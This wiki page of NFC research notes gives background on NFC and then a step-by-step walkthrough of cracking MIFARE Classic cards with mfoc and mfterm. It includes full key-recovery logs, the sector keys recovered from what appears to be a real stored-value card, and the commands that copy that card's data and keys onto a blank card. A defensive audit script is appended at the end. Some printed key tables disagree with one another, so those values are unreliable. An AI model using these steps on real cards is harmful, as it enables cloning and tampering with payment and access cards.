NFC Research
Revision as of 09:37, 17 July 2017 (Monday)
1 Overview
NFC, Near Field Communication, is a short-range wireless communication technology. It allows contactless point-to-point data transfer between electronic devices, exchanging data within ten centimetres (3.9 inches).
The technology evolved from RFID and was developed jointly by Philips Semiconductors (now NXP Semiconductors), Nokia and Sony; it builds on RFID and interconnection technology.
Near field communication is a short-range, high-frequency radio technology that operates at 13.56 MHz within a range of 20 cm. Three transfer rates are available: 106 kbit/s, 212 kbit/s and 424 kbit/s.
NFC has been adopted as the international standard ISO/IEC 18092, as ECMA-340 and as ETSI TS 102 190.
NFC is backward compatible with RFID: it integrates a contactless reader, a contactless card and peer-to-peer functionality into a single chip. Put simply, NFC is the evolved version of RFID.
2 Devices
- ACS ACR122U
  - a widely used NFC reader (USB interface)
- NFC-capable phones
  - Meizu MX3
  - Oppo Find 5
  - Xiaomi 2A, Xiaomi 3
  - SONY Xperia V LT25i
  - Samsung Galaxy Note 3, Galaxy Note 2, Galaxy Note, Galaxy S2, Galaxy S3, Galaxy S4
  - Nokia Lumia 720, Lumia 820, Lumia 920, plus Lumia 925, Lumia 928 and Lumia 1020
- proxmark3
3 Operating modes
Card emulation mode: in this mode the device behaves like an IC card built on RFID technology. It can replace the many IC cards in use today (credit cards included): shop payments, EasyCard transit fares, access control, travel tickets, admission tickets and so on. This mode has one big advantage: the card is powered by the RF field of the contactless reader, so it keeps working even when the host device (e.g. the phone) has no battery left.
Peer-to-peer (P2P) mode: this mode is similar to infrared and is used for data exchange, but with a shorter range, faster connection setup, a higher transfer rate and low power consumption (Bluetooth is similar). Linking two NFC-capable devices allows point-to-point data transfer, such as downloading music, exchanging pictures or synchronising address books.
Reader/writer mode: the device acts as a contactless reader, e.g. reading the balance and transaction history of a municipal transit card, or reading information from electronic tags on posters or exhibition displays.
4 Decoding
Mifare 1 S50 (1K EEPROM) and Mifare 1 S70 (4K EEPROM) have long since been completely broken; the newest deployments all use Mifare DESFire.
Hardware: ACR122U, around 200 RMB
Software: open-source tools
- scan keys: mfoc http://code.google.com/p/mfoc/
- crack the key of a single sector: mfcuk http://code.google.com/p/mfcuk/
- Mifare Classic card helper tool: mfterm https://github.com/4ZM/mfterm
- core support library: libnfc http://code.google.com/p/libnfc/
1. Building
<pre>
$ wget http://libnfc.googlecode.com/files/libnfc-1.7.0.tar.bz2
$ tar jxf libnfc-1.7.0.tar.bz2
$ cd libnfc-1.7.0
$ ./configure   # the default ACR122U driver is acr122_usb, which talks USB directly instead of going through the PC/SC middleware via the acr122_pcsc driver
$ make
$ sudo make install

$ wget http://mfoc.googlecode.com/files/mfoc-0.10.6.tar.gz && tar -xvzf mfoc-0.10.6.tar.gz
$ cd mfoc-0.10.6
$ ./configure
$ make
$ sudo make install

$ git clone git://github.com/4ZM/mfterm
$ cd mfterm
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install
</pre>
mfcuk builds the same way; if a library is missing during the build, install it and continue.
2. Scanning keys
Confirm that the system detects the ACR122U:
<pre>
$ nfc-list
nfc-list uses libnfc libnfc-1.7.0-40-g7e5257d
error	libnfc.driver.acr122_usb	Unable to claim USB interface (Operation not permitted)
nfc-list: ERROR: Unable to open NFC device: acr122_usb:001:009

$ sudo nfc-list
nfc-list uses libnfc libnfc-1.7.0-40-g7e5257d
NFC device: ACS / ACR122U PICC Interface opened
</pre>
On a VMware virtual machine this does not work; it keeps failing with an "Unable to write USB interface" error.

Start scanning the keys of all sectors:
<pre>
$ sudo mfoc -P 500 -O dump.card.file
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  02
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): 25  55  aa  10
      SAK (SEL_RES): 18
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 4K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 4K, Security level 1
* SmartMX with MIFARE 4K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [........................................]
[Key: a0a1a2a3a4a5] -> [/.......................................]
[Key: d3f7d3f7d3f7] -> [/.......................................]
[Key: 000000000000] -> [/.......................................]
[Key: b0b1b2b3b4b5] -> [/.......................................]
[Key: 4d3a99c351dd] -> [/.......................................]
[Key: 1a982c7e459a] -> [/.......................................]
[Key: aabbccddeeff] -> [/.......................................]
[Key: 714c5c886e97] -> [/.......................................]
[Key: 587ee5f9350f] -> [/.......................................]
[Key: a0478cc39091] -> [/.......................................]
[Key: 533cb6c723f6] -> [/.......................................]
[Key: 8fd0a4f256e9] -> [/.......................................]
Sector 00 - FOUND_KEY   [A]
Sector 00 - UNKNOWN_KEY [B]
Sector 01 - UNKNOWN_KEY [A]
Sector 01 - UNKNOWN_KEY [B]
Sector 02 - UNKNOWN_KEY [A]
Sector 02 - UNKNOWN_KEY [B]
Sector 03 - UNKNOWN_KEY [A]
Sector 03 - UNKNOWN_KEY [B]
Sector 04 - UNKNOWN_KEY [A]
Sector 04 - UNKNOWN_KEY [B]
Sector 05 - UNKNOWN_KEY [A]
Sector 05 - UNKNOWN_KEY [B]
Sector 06 - UNKNOWN_KEY [A]
Sector 06 - UNKNOWN_KEY [B]
Sector 07 - UNKNOWN_KEY [A]
Sector 07 - UNKNOWN_KEY [B]
Sector 08 - UNKNOWN_KEY [A]
Sector 08 - UNKNOWN_KEY [B]
Sector 09 - UNKNOWN_KEY [A]
Sector 09 - UNKNOWN_KEY [B]
Sector 10 - UNKNOWN_KEY [A]
Sector 10 - UNKNOWN_KEY [B]
Sector 11 - UNKNOWN_KEY [A]
Sector 11 - UNKNOWN_KEY [B]
Sector 12 - UNKNOWN_KEY [A]
Sector 12 - UNKNOWN_KEY [B]
Sector 13 - UNKNOWN_KEY [A]
Sector 13 - UNKNOWN_KEY [B]
Sector 14 - UNKNOWN_KEY [A]
Sector 14 - UNKNOWN_KEY [B]
Sector 15 - UNKNOWN_KEY [A]
Sector 15 - UNKNOWN_KEY [B]
Sector 16 - UNKNOWN_KEY [A]
Sector 16 - UNKNOWN_KEY [B]
Sector 17 - UNKNOWN_KEY [A]
Sector 17 - UNKNOWN_KEY [B]
Sector 18 - UNKNOWN_KEY [A]
Sector 18 - UNKNOWN_KEY [B]
Sector 19 - UNKNOWN_KEY [A]
Sector 19 - UNKNOWN_KEY [B]
Sector 20 - UNKNOWN_KEY [A]
Sector 20 - UNKNOWN_KEY [B]
Sector 21 - UNKNOWN_KEY [A]
Sector 21 - UNKNOWN_KEY [B]
Sector 22 - UNKNOWN_KEY [A]
Sector 22 - UNKNOWN_KEY [B]
Sector 23 - UNKNOWN_KEY [A]
Sector 23 - UNKNOWN_KEY [B]
Sector 24 - UNKNOWN_KEY [A]
Sector 24 - UNKNOWN_KEY [B]
Sector 25 - UNKNOWN_KEY [A]
Sector 25 - UNKNOWN_KEY [B]
Sector 26 - UNKNOWN_KEY [A]
Sector 26 - UNKNOWN_KEY [B]
Sector 27 - UNKNOWN_KEY [A]
Sector 27 - UNKNOWN_KEY [B]
Sector 28 - UNKNOWN_KEY [A]
Sector 28 - UNKNOWN_KEY [B]
Sector 29 - UNKNOWN_KEY [A]
Sector 29 - UNKNOWN_KEY [B]
Sector 30 - UNKNOWN_KEY [A]
Sector 30 - UNKNOWN_KEY [B]
Sector 31 - UNKNOWN_KEY [A]
Sector 31 - UNKNOWN_KEY [B]
Sector 32 - UNKNOWN_KEY [A]
Sector 32 - UNKNOWN_KEY [B]
Sector 33 - UNKNOWN_KEY [A]
Sector 33 - UNKNOWN_KEY [B]
Sector 34 - UNKNOWN_KEY [A]
Sector 34 - UNKNOWN_KEY [B]
Sector 35 - UNKNOWN_KEY [A]
Sector 35 - UNKNOWN_KEY [B]
Sector 36 - UNKNOWN_KEY [A]
Sector 36 - UNKNOWN_KEY [B]
Sector 37 - UNKNOWN_KEY [A]
Sector 37 - UNKNOWN_KEY [B]
Sector 38 - UNKNOWN_KEY [A]
Sector 38 - UNKNOWN_KEY [B]
Sector 39 - UNKNOWN_KEY [A]
Sector 39 - UNKNOWN_KEY [B]

Using sector 00 as an exploit sector
Sector: 1, type A, probe 0, distance 15105 .....
Sector: 1, type A, probe 1, distance 15147 .....
  Found Key: A [2c5a3710d3a5]
Sector: 2, type A, probe 0, distance 15147 .....
  Found Key: A [c3a4fa8db109]
Sector: 3, type A, probe 0, distance 15147 .....
  Found Key: A [3c34515b11d4]
Sector: 4, type A, probe 0, distance 15149 .....
  Found Key: A [0725a08f31e6]
Sector: 5, type A, probe 0, distance 15151 .....
  Found Key: A [5601f83644bb]
Sector: 6, type A, probe 0, distance 15149 .....
Sector: 6, type A, probe 1, distance 15149 .....
Sector: 6, type A, probe 2, distance 15149 .....
  Found Key: A [20f2bf55ac1a]
Sector: 7, type A, probe 0, distance 15147 .....
  Found Key: A [dd77fb8c3736]
Sector: 8, type A, probe 0, distance 15149 .....
Sector: 8, type A, probe 1, distance 15147 .....
  Found Key: A [c2180972c580]
Sector: 9, type A, probe 0, distance 15151 .....
  Found Key: A [742c582e8c04]
Sector: 10, type A, probe 0, distance 15151 .....
Sector: 10, type A, probe 1, distance 15193 .....
Sector: 10, type A, probe 2, distance 15151 .....
  Found Key: A [db338f92bb98]
Sector: 11, type A, probe 0, distance 15151 .....
  Found Key: A [15559907e873]
Sector: 12, type A, probe 0, distance 15151 .....
  Found Key: A [c8313c454d2a]
Sector: 13, type A, probe 0, distance 15149 .....
Sector: 13, type A, probe 1, distance 15149 .....
  Found Key: A [c896c22e5b3e]
Sector: 14, type A, probe 0, distance 15149 .....
  Found Key: A [72558e3fe66c]
Sector: 15, type A, probe 0, distance 15151 .....
  Found Key: A [aec383ce3c12]
......
......
</pre>
When it finishes, the entire card contents are written to the file dump.card.file.
3. Reading again
Once the keys of all sectors have been recovered, later reads can simply load dump.card.file in mfterm; mfterm extracts all the keys from it automatically, and subsequent reads and writes are much faster.
On an NFC-capable phone, the MifareClassicTool app can be used for reading and writing on the move, which is far more convenient.
<pre>
comcat@jackslab:~$ mfterm
$ read
No key argument (A|B) given. Defaulting to A
error	libnfc.driver.acr122_usb	Unable to claim USB interface (Operation not permitted)
Could not connect to any NFC device

comcat@jackslab:~$ sudo mfterm
$ help
quit                         Exit the program.
load                         Load tag data from a file.
save                         Save tag data to a file.
clear                        Clear the current tag data.
read A|B                     : Read tag data from a physical tag.
read unlocked                On pirate cards, read card without keys.
write A|B                    : Write tag data to a physical tag.
write unlocked               On pirate cards, write 1k tag with block 0.
print 1k|4k                  : Print tag data.
print keys 1k|4k             : Print tag's keys.
print ac                     Print access conditions.
set #block #offset = xx xx xx : Set tag data.
keys load                    Load keys from a file.
keys save                    Save keys to a file.
keys clear                   Clear the keys.
keys set A|B #S key          : Set a key value.
keys import                  Import keys from the current tag.
keys test                    Try to authenticate with the keys.
keys 1k|4k                   : Print the keys.
dict load                    Load a dictionary key file.
dict clear                   Clear the key dictionary.
dict attack                  Find keys of a physical tag.
dict                         Print the key dictionary.
spec load                    Load a specification file.
spec clear                   Unload the specification.
spec                         Print the specification.
mac key <k0..k7>             : Get or set MAC key.
mac compute #block           : Compute block MAC.
mac update #block            : Compute block MAC.
mac validate 1k|4k           : Validates block MAC of the whole tag.

$ read
No key argument (A|B) given. Defaulting to A
Connected to device, but no tag found.

$ keys load dump.card.file   # parse the dumped card data directly and load the keys
Successfully loaded keys from: dump.card.file
$ keys
xS  xB  KeyA          KeyB
----------------------------------
00  03  c0c1c2c3c4c5  a1475c9ee325
01  07  2c5c3710d3c5  b40b2c0d47f1
02  0b  c1f4ff83b109  dc0fc2d4d8cc
03  0f  3c34515b11d4  b42fc69d3ccf
04  13  0725c08f31e6  f8cf2c85e843
05  17  5601f83644bb  c9398274cc1d
06  1b  20f2bf55cc1c  8f5cd31b4f53
07  1f  dd77fb8c3736  e95fc402e7b6
08  23  c2180972c580  d43ec542967d
09  27  742c582e8c04  d43ec542967d
0a  2b  db338f92bb98  e92d77b9c1f2
0b  2f  15559907e873  4f94956dfce7
0c  33  c8313c454d2c  25860937cf4d
0d  37  c896c22e5b3e  717b5b4b67d2
0e  3b  72558e3fe66c  cded278592c2
0f  3f  cec383ce3c12  f1475c9ee325

$ keys test 4k A   # verify the keys
$ keys save /tmp/a
Successfully wrote keys to: /tmp/a
$ keys load /tmp/a
Successfully loaded keys from: /tmp/a

$ read   # read all data from the card
No key argument (A|B) given. Defaulting to A
Reading: [.........0x13.0x12.0x11.0x10................] Auth errors in indicated sectors.
Read MIFARE Classic 4k (SAK: 18, ATQA: 00 02)
$ quit
comcat@jackslab:~$
</pre>
5 Writing
Dump the blank card first; every sector is still on the factory default keys. The unlocked write (W) then fails because this card does not accept the unlock command, while the normal write (w) succeeds for 63 of 64 blocks (block 0, the manufacturer block, is skipped):
<source lang=bash>
# mfoc -P 500 -O blank.card.orig.dump
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): f5  15  e9  c4
      SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
......
......
Sector 00 - FOUND_KEY   [A]
Sector 00 - FOUND_KEY   [B]
Sector 01 - FOUND_KEY   [A]
Sector 01 - FOUND_KEY   [B]
Sector 02 - FOUND_KEY   [A]
Sector 02 - FOUND_KEY   [B]
......
......

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
......
......

# nfc-mfclassic W a ykt20.dump blank.card.orig.dump f
NFC reader: ACS / ACR122U PICC Interface opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04
       UID (NFCID1): f5  15  e9  c4
      SAK (SEL_RES): 08
Guessing size: seems to be a 1024-byte card
Sent bits:     50  00  57  cd
Sent bits:     40 (7 bits)
unlock failure!

# nfc-mfclassic w a ykt20.dump blank.card.orig.dump
NFC reader: ACS / ACR122U PICC Interface opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04
       UID (NFCID1): f5  15  e9  c4
      SAK (SEL_RES): 08
Guessing size: seems to be a 1024-byte card
Writing 64 blocks |...............................................................|
Done, 63 of 64 blocks written.
</source>
Dump the written card again; its sectors now carry the keys and access bits from ykt20.dump:
<source lang=bash>
# mfoc -P 500 -O dump.card.file
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): f5  15  e9  c4
      SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [................]
[Key: a0a1a2a3a4a5] -> [/...............]
[Key: d3f7d3f7d3f7] -> [/...............]
[Key: 000000000000] -> [/...............]
......
......
Sector 00 - FOUND_KEY   [A]
Sector 00 - UNKNOWN_KEY [B]
Sector 01 - UNKNOWN_KEY [A]
Sector 01 - UNKNOWN_KEY [B]
Sector 02 - UNKNOWN_KEY [A]
Sector 02 - UNKNOWN_KEY [B]
......
......

Using sector 00 as an exploit sector
Sector: 1, type A, probe 0, distance 32 .....
Sector: 1, type A, probe 1, distance 32 .....
  Found Key: A [2c5a3710d3a5]
Sector: 2, type A, probe 0, distance 32 .....
Sector: 2, type A, probe 1, distance 32 .....
  Found Key: A [c1f4ff83b109]
Sector: 3, type A, probe 0, distance 32 .....
Sector: 3, type A, probe 1, distance 32 .....
  Found Key: A [3c34515b11d4]
Sector: 4, type A, probe 0, distance 32 .....
  Found Key: A [0725a08f31e6]
Sector: 5, type A, probe 0, distance 32 .....
  Found Key: A [5601f83644bb]
......
......

Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key aec383ce3c12 :00 00 00 00 00 00 7f 07 88 00 00 00 00 00 00 00
Block 62, type A, key aec383ce3c12 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key aec383ce3c12 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
......
......
</source>
In mfterm, load the keys from the new dump and from ykt20.dump and compare; the two key tables are identical, and a read with them succeeds:
<source lang=bash>
# mfterm
$ keys load dump.card.file
Successfully loaded keys from: dump.card.file
$ keys
xS  xB  KeyA          KeyB
----------------------------------
00  03  a0a1a2a3a4a5  f1475c9ee325
01  07  2c5a3710d3a5  840b2a0d47f1
02  0b  c1f4ff83b109  dc0fa2d4d8aa
03  0f  3c34515b11d4  b42fa69d3acf
04  13  0725a08f31e6  f8cf2c85e843
05  17  5601f83644bb  c9398274ca1d
06  1b  20f2bf55ac1a  8f5ad31b4f53
07  1f  dd77fb8c3736  e95fc402e7b6
08  23  c2180972c580  d43ea542967d
09  27  742c582e8c04  d43ea542967d
0a  2b  db338f92bb98  e92d77b9a1f2
0b  2f  15559907e873  4f94956dfae7
0c  33  c8313c454d2a  25860937af4d
0d  37  c896c22e5b3e  717b5b4b67d2
0e  3b  72558e3fe66c  aded278592c2
0f  3f  aec383ce3c12  f1475c9ee325

$ keys load ykt20.dump
Successfully loaded keys from: ykt20.dump
$ keys
xS  xB  KeyA          KeyB
----------------------------------
00  03  a0a1a2a3a4a5  f1475c9ee325
01  07  2c5a3710d3a5  840b2a0d47f1
02  0b  c1f4ff83b109  dc0fa2d4d8aa
03  0f  3c34515b11d4  b42fa69d3acf
04  13  0725a08f31e6  f8cf2c85e843
05  17  5601f83644bb  c9398274ca1d
06  1b  20f2bf55ac1a  8f5ad31b4f53
07  1f  dd77fb8c3736  e95fc402e7b6
08  23  c2180972c580  d43ea542967d
09  27  742c582e8c04  d43ea542967d
0a  2b  db338f92bb98  e92d77b9a1f2
0b  2f  15559907e873  4f94956dfae7
0c  33  c8313c454d2a  25860937af4d
0d  37  c896c22e5b3e  717b5b4b67d2
0e  3b  72558e3fe66c  aded278592c2
0f  3f  aec383ce3c12  f1475c9ee325

$ read
No key argument (A|B) given. Defaulting to A
Reading: [................] Success!
Read MIFARE Classic 1k (SAK: 08, ATQA: 00 04)
</source>
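The mfterm `keys load` step in section 4.3 and the sector-trailer lines in the mfoc dumps above (`ff 07 80 69` on the blank card, `7f 07 88 00` after the write) both rest on the same structure: each sector's last block holds key A, three access-condition bytes, a general-purpose byte and key B. The following audit script is an added example, not code from the original page nor part of mfoc, mfterm or libnfc. It assumes the raw dump layout that `mfoc -O` writes (64 blocks of 16 bytes for a 1K card), parses every sector trailer, checks that the access bits pass the card's own inverted-copy format check, decodes the trailer condition (C1, C2, C3) for block 3, and flags sectors that still use a default key or an access configuration under which key A alone reveals or rewrites the keys. The sample dump is constructed inline (made-up UID and per-sector keys); the default-key list is a subset of the keys mfoc tried in the scan above.

```python
"""Audit a MIFARE Classic 1K dump for weak sector configuration.

Added example, not code from the original page and not part of mfoc/mfterm.
Assumptions: the dump is the raw layout mfoc writes with -O (64 blocks of
16 bytes, 1024 bytes for a 1K card); the sample dump built below is
constructed for illustration (made-up UID and per-sector keys)."""

BLOCK = 16
SECTORS_1K = 16

# Subset of the default/transport keys mfoc tried in the page's scan.
DEFAULT_KEYS = {
    "ffffffffffff", "a0a1a2a3a4a5", "d3f7d3f7d3f7", "000000000000",
    "b0b1b2b3b4b5", "4d3a99c351dd", "1a982c7e459a", "aabbccddeeff",
}

# Sector-trailer access conditions (C1, C2, C3 of block 3) under which a
# holder of key A can read key B and/or rewrite the keys (MF1S50 datasheet).
WEAK_TRAILER = {
    (0, 0, 0): "transport: key A rewrites both keys, key B readable with key A",
    (0, 0, 1): "key A rewrites both keys, key B readable with key A",
    (0, 1, 0): "key B readable with key A",
}


def decode_access_bits(b6, b7, b8):
    """Decode trailer bytes 6..8 into {block: (C1, C2, C3)} for blocks 0..3.

    Each condition nibble is stored twice, once inverted; the card checks this
    on every access, and a trailer that fails the check locks the sector."""
    c1, c2, c3 = (b7 >> 4) & 0xF, b8 & 0xF, (b8 >> 4) & 0xF
    nc1, nc2, nc3 = b6 & 0xF, (b6 >> 4) & 0xF, b7 & 0xF
    if (c1 ^ nc1, c2 ^ nc2, c3 ^ nc3) != (0xF, 0xF, 0xF):
        raise ValueError("access bits fail the inverted-copy check")
    return {i: ((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)}


def parse_sectors(dump):
    """Split a 1K dump into sectors with key A, access bytes and key B."""
    if len(dump) != SECTORS_1K * 4 * BLOCK:
        raise ValueError("expected a 1024-byte MIFARE Classic 1K dump")
    sectors = []
    for s in range(SECTORS_1K):
        blocks = [dump[(4 * s + b) * BLOCK:(4 * s + b + 1) * BLOCK] for b in range(4)]
        trailer = blocks[3]
        sectors.append({"blocks": blocks, "key_a": trailer[0:6].hex(),
                        "access": trailer[6:9], "key_b": trailer[10:16].hex()})
    return sectors


def audit_dump(dump):
    """Return (sector, finding) pairs: default keys, weak or corrupt trailers,
    and a manufacturer block whose BCC does not match the UID."""
    findings = []
    sectors = parse_sectors(dump)
    b0 = sectors[0]["blocks"][0]
    if b0[0] ^ b0[1] ^ b0[2] ^ b0[3] != b0[4]:   # BCC = XOR of the 4 UID bytes
        findings.append((0, "bcc-mismatch"))
    for s, sec in enumerate(sectors):
        if sec["key_a"] in DEFAULT_KEYS:
            findings.append((s, "default-key-A"))
        if sec["key_b"] in DEFAULT_KEYS:
            findings.append((s, "default-key-B"))
        try:
            cond = decode_access_bits(*sec["access"])
        except ValueError:
            findings.append((s, "corrupt-access-bits"))
            continue
        if cond[3] in WEAK_TRAILER:
            findings.append((s, "weak-trailer"))
    return findings


def make_trailer(key_a, access, key_b, gpb=0x00):
    """Assemble a 16-byte sector trailer: key A, 3 access bytes, GPB, key B."""
    return bytes.fromhex(key_a) + bytes(access) + bytes([gpb]) + bytes.fromhex(key_b)


def build_sample_dump():
    """Constructed 1K dump: sector 0 still on default keys with transport
    access bits (ff 07 80), sectors 1-14 re-keyed and hardened (7f 07 88),
    sector 15 with a deliberately corrupt trailer."""
    uid = bytes.fromhex("deadbeef")                 # made-up UID
    bcc = uid[0] ^ uid[1] ^ uid[2] ^ uid[3]
    block0 = uid + bytes([bcc, 0x08, 0x04, 0x00]) + bytes(8)   # BCC, SAK 08, ATQA 04 00
    empty = bytes(BLOCK)
    out = bytearray()
    for s in range(SECTORS_1K):
        if s == 0:
            trailer = make_trailer("a0a1a2a3a4a5", (0xFF, 0x07, 0x80), "ffffffffffff", 0x69)
        elif s == SECTORS_1K - 1:
            trailer = make_trailer("1f" * 6, (0xFF, 0x07, 0x88), "cf" * 6)   # corrupt
        else:
            trailer = make_trailer(f"{0x10 + s:02x}" * 6, (0x7F, 0x07, 0x88),
                                   f"{0xC0 + s:02x}" * 6)          # made-up keys
        out += (block0 if s == 0 else empty) + empty + empty + trailer
    return bytes(out)


if __name__ == "__main__":
    for sector, finding in audit_dump(build_sample_dump()):
        print(f"sector {sector:02d}: {finding}")
```

Run against the constructed dump, the audit reports sector 0 (default key A and key B, transport trailer condition 0 0 1) and sector 15 (corrupt access bits); sectors 1 to 14 are clean. Running the same check over a real dump before any `write` is the practical reason for the access-bits test: the MF1S50 datasheet states that a trailer whose access bits fail the inverted-copy check leaves the sector irreversibly blocked, and a dump edited by hand with `set` in mfterm is the usual way to get such a trailer.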